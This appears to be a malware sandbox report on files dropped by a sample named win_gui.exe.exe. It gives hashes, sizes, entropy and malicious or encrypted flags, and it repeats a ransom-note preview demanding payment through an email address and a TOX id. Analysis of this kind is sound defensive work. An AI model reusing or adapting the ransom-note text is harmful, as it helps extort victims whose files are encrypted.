                                SSDEEP:98304:lAABjXt8md3x/pS6+X3Bzx3FVjbqOMhbJ52NID:pt8md3x/pS6uBzoNhtT
                                MD5:3CBE299688C617F3B5EE2BBC58ABE1C3
                                SHA1:DF2942835BEBD2C0F9CC825E8ADC63AC39536C8F
                                SHA-256:2BF317F84C4B861872181D95E29942266135997B99B98678A71562794CCE11B1
                                SHA-512:5234D4C7769EE962EBF7F6CF1022B17531EA8E9339BEBC0BE39363BA3D49C09BFDD27453877D9403CFB76E2BD337A0AA435D4CEA31FFCD2A843C93D5EC925B9C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1595467
                                Entropy (8bit):7.945953786651401
                                Encrypted:false
                                SSDEEP:49152:yJAYlO3BpOmxQ0CpGPlt93AGnQ1kxnqIVF:yJAn3Up2RAIQYnqIv
                                MD5:38076B2B0AF360CADDA45731ADA0436B
                                SHA1:5A9BC147E43FF271A6868E649E08E3A47F1AE1FB
                                SHA-256:37F111E1D565F1AFC6590016EB3738AB75AC76A0A590EFF2767E413C2B8BB039
                                SHA-512:90BD4D412088350BA70D4A3799D8B42CEE87FA287B08C91108158A90531C1377D8CB0E076A7610BFD1594038A34E36BF2F0EADE4C38FAF6F00B6CB20C5D93521
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1838139
                                Entropy (8bit):7.948010826456849
                                Encrypted:false
                                SSDEEP:49152:PYo3rCYlO3BpUxe0J29T8g+ycADO02rvizPctl:1Wn3AV29OycJ3
                                MD5:715C4EA911AB34C9BDF31E9DC3E0CDA9
                                SHA1:D606F9051883D9621C72D78AAC6801AD6EDF4E1F
                                SHA-256:748278FA2663C722AC479DD11752E1B6FE8841797C53070474825AFB4C0F52B8
                                SHA-512:6E9DC0E2DB54BDDBF1B5A786A7945B1C4D36C196DD359EC65ECAFB1506BAF1A60EEF695EEAA7986B0380A7D847D266C496ACF6A3C6C8FA80D884DF2B42BF1EBA
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):329396
                                Entropy (8bit):7.999458971342388
                                Encrypted:true
                                SSDEEP:6144:UIlV/eXjPPREuCnQIVmI8i4lOHIMfo1DQB2jo7TyCnIYEcFJGBgWxY:UIlhWjBEuAQIII8xkQ10mgTqYEcFJGP6
                                MD5:347EB0D21679FA0359E01CF62F2D0AA2
                                SHA1:A48234F9ED7D030C3FD25777457BE87D30868C82
                                SHA-256:6A0D5A169D5D625257D2B733853CBC7203C919DE46366687E358CE916611846B
                                SHA-512:1C882EAAD747B41D3E512907F1F7F59B63AA5C4EB4FB176CF3C881580285593E69D071520AA802E66CABD7FB02331B9B12F17E6AFA1F89223CD70F1C9E0AACDE
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):307491
                                Entropy (8bit):7.999459976821999
                                Encrypted:true
                                SSDEEP:6144:hBp/fdX2jB59w/KZ+9+TMx/Mtu0JcBj0+eWVc3+WOyD+6IkWDKgdhf9agd2jUBwZ:hHdGjBCKo4M1hqCzDcuWI/rfyPEVy
                                MD5:9271A4B0D915B9484E20C29C6B3D8810
                                SHA1:D4B1EE953A292F6D5CECB7110A675BDF9517F7D8
                                SHA-256:C7A4AEE627F2B55D685CD9C9D52FFDF9B0401FFC85EA8BCAE292AF3D4681E60F
                                SHA-512:11873BE6009F6736841AE8EB3E84D77082588431083AFAAC0AB1B31017E11C34C1B1264A91B9902D0681013565BD647FFAFE8CB95299047D8D74C5FB6514E2B9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8706177
                                Entropy (8bit):7.975157344042223
                                Encrypted:false
                                SSDEEP:196608:yjK7YlmZcPZClC6QAZ2sjCvWJo2sKLCIV5JAmadFS/Zurw:KHlVUPQAriWJo2Lrsrw
                                MD5:D0B4E6FCA8933A3D4FBDA695461F280B
                                SHA1:850F0A2D1FBDD070E44755114A7CC81CDA88ABA1
                                SHA-256:944CE6CBC6A65F956A2BC2CFB2641E6396B8FA00C82A8564AA64602F8C881597
                                SHA-512:17C27EFC438DD94653CADAF4D4F1746B3D668AD0099680B1DF0282B09806459C1AFE94A38D815C49508CE0494175528862C410FAA1A8A85AA5791FC8DE299BFE
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1623868
                                Entropy (8bit):7.92955460291453
                                Encrypted:false
                                SSDEEP:49152:dqah71PI+6fB3Abk+iQHZtHmV4RfiMNccSvIr/nSh:sag+6pQbk+iEZtGV4lVWcSvIr/n6
                                MD5:5315ECE7C5085A4DE23459C4BA257031
                                SHA1:C23F6401E36FDEDA4A4AD6678F6CA511429983CB
                                SHA-256:A9E293592475C613E890A9F5576D01C00CBA05BFB2F5E7A85515666EB9E78FE9
                                SHA-512:7729DCE777763A86BD172D7B8979DFD3D640BDF3A246A6387372C699C17AC6D489C5C5DE38BB1FD0CA8FBA86C24AC812DAA672BE68A503AC5737B9101A4886D4
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):865418
                                Entropy (8bit):7.941334721124736
                                Encrypted:false
                                SSDEEP:12288:3oUUO6zqjl6HXIgRoy0Lop1uns8fj7dfFfqVTeNf+pJIZDOZm002sPzPEpX0+s0R:zy35VooKsEfBaeVMJLZm0kajwuQfUX
                                MD5:2DA2F5EED127B1A3E0EC6E564BEA2CC4
                                SHA1:D4429D97CB337948DABF08B4F2D93E5781F89C64
                                SHA-256:F1B39F5E19D85EB736666741DB3C0D5B19BDEFE93D6E087425F7BA3DA10D7DDD
                                SHA-512:FFA40058B13F6B457F412637CBEA270CFA31F20102327E02A214956ACDA816876C485002F40758ABAFDC68FD65B09905A2DF846BD66B87ABE4B64B05C5995408
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):772641
                                Entropy (8bit):7.9542632556813
                                Encrypted:false
                                SSDEEP:12288:ICcEvhvQMuHM2MOQj7NA7JW3YYNLHFvHxozHUt3Uz7R6Z+ptghUGJDTQMUryRmJa:IVEvhoDi7NAANLlvHxoz0t/ZdxwJZ9De
                                MD5:2E911ECE0CB38FC52F5D674A5F96DB74
                                SHA1:A1B6E28E2EE82A6DC9A20B5187E3BAAC18018E12
                                SHA-256:FF162F1F020624B2F6617FFD7573A3B64CE9FE451ED33F4035E7D453C3A4D5DC
                                SHA-512:7F785A50255B4BEC10C9D9448D4117148426509E813603403598B347159DB6EB5C28E4445010F5464CACA910E09607558948C0F7F67C52794BA2BB508CD69E06
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):68348
                                Entropy (8bit):7.997326446559704
                                Encrypted:true
                                SSDEEP:1536:0VfAk/nKkrvuGVpmGUvwWiie/AxOksjmb1ZvnxsXHT3uCTHykX5:cFKkDvVIPCAx3bhZ/+Xz+cJ
                                MD5:05D51CBBE2B41ABE9D0BD26A936A36FE
                                SHA1:2AFAD2B24F173C5E105E3D9301AA57D9184921D5
                                SHA-256:DECC15C02058939A1E7F71BE31303A6DA255F9A7242764F38AA05421983B869B
                                SHA-512:448FC1950DDC24BE333FE5ABF9464BF1E18948F7090FF99255AD78F8C466E113B0D5F15C0DDDBB92D355828AB8862C5A5F792D87BD77763C7685F10449D781A4
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17556
                                Entropy (8bit):7.988576764272021
                                Encrypted:false
                                SSDEEP:384:JoETATe6bQia+0yu/dsEc883+rnYYXW5pqxrgm57L9Y2fDJQW3+VOdW:eE0CBia+0yBEc8nYYXYp3m19Y2fDJQWs
                                MD5:1F70ED38D5468CC2F8327CA7A171251A
                                SHA1:F84A869E5C2684EC33EC3DFEA5746BB1C63F8FFC
                                SHA-256:349470F01A27A1FD3E29ADB7A86695C12C13FF4640A732592CFD869CAD0FFB13
                                SHA-512:4BCF6F5A0477AE05E9548B55D649716FCF4E25D163842DA04045E50A88BE3B3F1D8D0CCC2456BEC32DD52538C0944A84B3B5D4EBF29069A65228894B9B2C21A3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):174296
                                Entropy (8bit):7.998846328690469
                                Encrypted:true
                                SSDEEP:3072:p0i/znyZxuUDXVCCbFO8hwM2pEoLIfydqn3duEAp3SmV3jsj3hhBX:xLyDudCbFOOwM0EKkyFEAp3JV3jsbhhl
                                MD5:F9D8E290904397A6590A7BF305B94E88
                                SHA1:F43CDDE51AB71D77FCB5C7C57A4118B91055E4DC
                                SHA-256:0A6D5E38EB15FC397E108E75A9BDF3A22DB872E51DF8079BD9D57A377AFCBEAF
                                SHA-512:994CAD0BAE2ABB90135A5A2BD1D1181C8E8FBC691D7D4504AD3919E32A092424723B0F363C017BD566A15F10C58023173463544235278022738C7D55D4197058
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):95054
                                Entropy (8bit):7.998035396213496
                                Encrypted:true
                                SSDEEP:1536:7m6Y0vdJWyhFOZN69kYga4f1q2l64k5/djTdOwlqDyDEU+5tNc5J1NfwAEZHkl6:669J/hFOZw9kYLY1561/dTdah5kdNfd8
                                MD5:375D1D72A2004CE8015D8B65C8E330D2
                                SHA1:7F9FF264F88C55292A22D8EF3E34A1649E85336F
                                SHA-256:FCE399C7E06D771148FD43C66825C8D1E51EFAB545CA3ACF542776059CC36555
                                SHA-512:5ADD5010B77766D5A3788EE298E03CE5462F52E314B66A2155BA2C24BC589CF9AB7E65888612FD6DFB9C3121D6D15EC3741AEB836E0F416F194FC7FA684370B9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1664
                                Entropy (8bit):7.864028799957495
                                Encrypted:false
                                SSDEEP:48:Jqr7hqR9rGgod/zoS4N7/WyYu+MAVMJg6TO:JqPMHud/0fN7evuAVOO
                                MD5:DFF54B9CDAF3B5A65465F459841F98C1
                                SHA1:64DB3E7BD7408EB5D282DCDE3330D0DF7A50F493
                                SHA-256:54E48D5067E71C2AC04777B4EFB5923B0631A1D1F233037358F65932DAA10249
                                SHA-512:8996907737534661A06FA44F3400DA9858D95A56B7D9A28D309416CBEB80D1DEB9E463C563A7488CB21DB7C5E1F8F8AC5710E87850DE8A708B700F535684BDF6
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):102314
                                Entropy (8bit):7.998057581169843
                                Encrypted:true
                                SSDEEP:1536:iee6oaPeOoD7lpcS3ZwfeTUP34ZrLRu5khIlUPPBJeIF0oaV7g5g+LB:iee6Pe/5wfHf4Zr5ClUPP6IF0oaNg68B
                                MD5:31B4995447F6FDE0D82919B7267FEF9B
                                SHA1:F01AF399923C7BE4649158767B54E7F7C42CB145
                                SHA-256:CD74201D6E8B64D0812F599DADD2FA1D327D61EFB57A829370C3A2A0CCE8C40A
                                SHA-512:9C22E835C21D4583F0A7DDFCD34ACBDDECFF053FFA460DAFFB1463EAB25384DE1379388C5E07168C32394F6E1034C5B74EF7924729DD82C24C34C6F76DCD9F5E
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):59644
                                Entropy (8bit):7.997026631063287
                                Encrypted:true
                                SSDEEP:1536:0faGhYzDN8c1dG5cPuIDeW3tMBTpSfEGfoq99IFrgB:AaQWN8eG5cPuCpfEsoq3+rg
                                MD5:E95DA8EA0DBF3D3DB43136DF5ACF60A3
                                SHA1:9919DA0DCF7442A064B5CA06335EA789916FF34A
                                SHA-256:296A30821A4F6CE84CE3049E55A54E7487E34CA412FB6DD1C07B2AFCBB720C84
                                SHA-512:0D169DBDFADD31E1C6C3D203B7807DBAB44E1CDBEC28FB4638D4985CDCEB1F72D39B8D4A1D15B47F03E16205D0B515D174B71FA6DFF3D42F3BCD23E848ED9271
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10422
                                Entropy (8bit):7.979736095838601
                                Encrypted:false
                                SSDEEP:192:kczuwl8xYIH9hwfUMqTIqf+pNu79aCD6a35nXa4q5z3WmxD27XkfeYKa2+VOY:xF8DK+TILpAvDXpjUamtgXkf72+VOY
                                MD5:BAA2885828BA89C1F946156AACE71E51
                                SHA1:0C97D0178C0631A9B2189CC89CBCE8C1652E92A6
                                SHA-256:DC45A59D27D59C62016EF288151CB6760B3030AB6A4834912BCA7293F211D0B3
                                SHA-512:B748428A0516FE238B1789E2457A540EC36769408213BC4BE9529AC0224A09327CE8C971147CBD1F7AC8B7451D73F7D557B1F14D0A51751C5D307D53C74E2F18
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38578
                                Entropy (8bit):7.995191232608667
                                Encrypted:true
                                SSDEEP:768:/6KCTd2m6fr4LyK8JQN29ZzhFd0yHVh29Hfr/pjiIubVq:FLV9QNeRhFdPH2pGIupq
                                MD5:7EE8AD824ED06B5ED1DA030B70DD410F
                                SHA1:9690CD6723C2A3388203C45E3CDC239380646CB1
                                SHA-256:3BA05D05EC0C81CB4740F3721E97AE3210909692F56B751B2CB856C98078D45B
                                SHA-512:604FA0C1CE3ABF0F0E29A7E7E15F292E93A099FAA856C12B0EAE38AD31E634AA23B42159A2463D835476D562BFE7AC2649ACA5F5C21F34AE9A486EC61F9D2781
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):22666
                                Entropy (8bit):7.993147555732763
                                Encrypted:true
                                SSDEEP:384:qgBSQ7A1Q+m4YI/gMKP2tr2qECSUuzidE2XMtQ4skcCU3suzIslafyXkd9wX1P+F:qPQ7mQ+m4Ybp2tCqEJDz4EKMtN6CU8uA
                                MD5:573655B6C9ACAF9598501E7E7C2B14F4
                                SHA1:110B1F5D0390ABF635A45297EF13C6DCE3A76A4C
                                SHA-256:59A32174D33372BBC58447BE6CB35BA2F1FAE925A4416E2E820B1E2BFFDAF8A9
                                SHA-512:83680519B13A02425669E285C674BE51516371909F8EA8BD04E0A9AC8550F2733AD905748DA98C3D3DDA9946468E91EA024110C6657BB1B36F452533EA3A78BB
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12026
                                Entropy (8bit):7.983765093066229
                                Encrypted:false
                                SSDEEP:192:FhIaBS88bciBfg6IK7JegGyFs87NJqOYnDIJIGAlcmW0aGSYrjvWPhr6gBBCjQ+d:FGaBsbcNlYevyPqOYn+VAlcmnPZr7WZk
                                MD5:A59B2E80BDC96E1C3A29AAF037CD6A1E
                                SHA1:2BF46B92497D4D002864A2E6D6BD7164CFB2623E
                                SHA-256:429DF0F478413CA6EC7F0FE453F9E68B0471C94FD543EA46212C9B08B0AF86CE
                                SHA-512:B69986ACC020EFB784000A497AC68A0BE204C81CD90FECDB958351081DAAA10C859F18B951AC217743A4477FE11CD7FA9713C544343A5CC604F57BAA88539F6A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:frozen file 1.0 (or gzip 0.5)
                                Category:dropped
                                Size (bytes):284718
                                Entropy (8bit):7.99927748311118
                                Encrypted:true
                                SSDEEP:6144:10FLhvenrrY10Vfz0wcepOMRuZJkJngYSjckcnQ7wUcTuV52G+UBhllXHT+Sy4gv:gL681ifWNMYZGJngYU7wvGbBpQv
                                MD5:CA2046377FAB90724AF62494172405BC
                                SHA1:0A18F996865E78C2AD5147D6E471145965A2DEE9
                                SHA-256:8DFBEC73187C7F906EBF6B5067FB1D333EEDBBF6627B4876A77E7CA7232246F8
                                SHA-512:81E9ABFFF166181B9C825C6E8E0FDB3FEF8BDCCA981898DE04C8E5AF598D3FEA15382BC5A511A2C802906AA31EA64E698678E0CB0209CCBB3C404C0188FAD138
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):134572
                                Entropy (8bit):7.998596058701348
                                Encrypted:true
                                SSDEEP:3072:o6vA3uGTuPa+3NNuHMEv4OW5oPHITaM3o06VYnJ201Qd:o6vARG9NYwz5kHwpVuYJSd
                                MD5:F3CEE3CB8266BEC45FDAFEAF4546AE98
                                SHA1:A4871B87AFB738F67605ADFBC000C44E9EC306B6
                                SHA-256:0B27CF5274C03F962035F398FD043DF39E0424238219EDEFFBBC9C4BBDF79CFF
                                SHA-512:12ABC79EF827FB417E939BE71F967FBFA8A68B371027DF7ECF45C3C3C6E6F002A17D9AF1BF0ED5B796C46C7570FF12182DCDC66269143DA6AA88BA66B0EE48AB
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19018
                                Entropy (8bit):7.989987692791979
                                Encrypted:false
                                SSDEEP:384:wYfBAnOku65OAtmQThHFbenphmKb8ksIQNKqIQ1C0rNsR2pAU3gK+VOf:nqOt6gURbophV8ks1jp1tNI25wKj
                                MD5:DDB43EB4AF6C76DFB83E49765F225E4B
                                SHA1:30ECEC9BB989B9462A4653F0CCB19C0FD26622C9
                                SHA-256:003B8460E4B04D0F995C8473542023CA0CE6770B9029FF796F2B582214A1DFF0
                                SHA-512:C81401A44528E720A4DD6E16B2499A7E995737193FBDE48F2EF2C583740F27B0E77296AACAE9C68D6B66C89024FB8561A64E4F03E7FC14A006792B6710A64F09
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
